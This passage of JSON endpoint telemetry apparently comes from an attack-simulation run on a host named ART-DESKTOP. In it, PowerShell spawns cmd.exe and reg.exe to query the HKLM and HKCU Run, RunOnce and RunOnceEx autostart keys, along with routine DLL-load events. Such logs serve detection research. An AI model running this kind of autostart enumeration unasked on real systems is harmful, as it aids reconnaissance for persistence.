"{42FC7E13-CB0B-5C05-0000-001072BB5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - 
{ - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "process", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "process", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7860, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571313530000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}", - "unique_ppid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4136, - "ppid": 7860, - "process_name": "reg.exe", - 
"process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571313640000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 
4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "process", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "process", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3952, - "ppid": 7036, - "process_name": "cmd.exe", - 
"process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571313799984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", - "event_type": "process", - 
"logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 360, - "ppid": 3952, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571313880000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001021C05001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "process", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "process", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": 
"powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5500, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571314060000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3824, - "ppid": 5500, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571314150016, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": 
"C:\\Windows\\System32\\msvcrt.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "process", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "process", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "command_line": 
"\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6396, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571314320000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": 
"C:\\Windows\\System32\\msvcrt.dll", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1060, - "ppid": 6396, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571314410000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - 
"timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "process", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "process", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2912, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571314599984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": 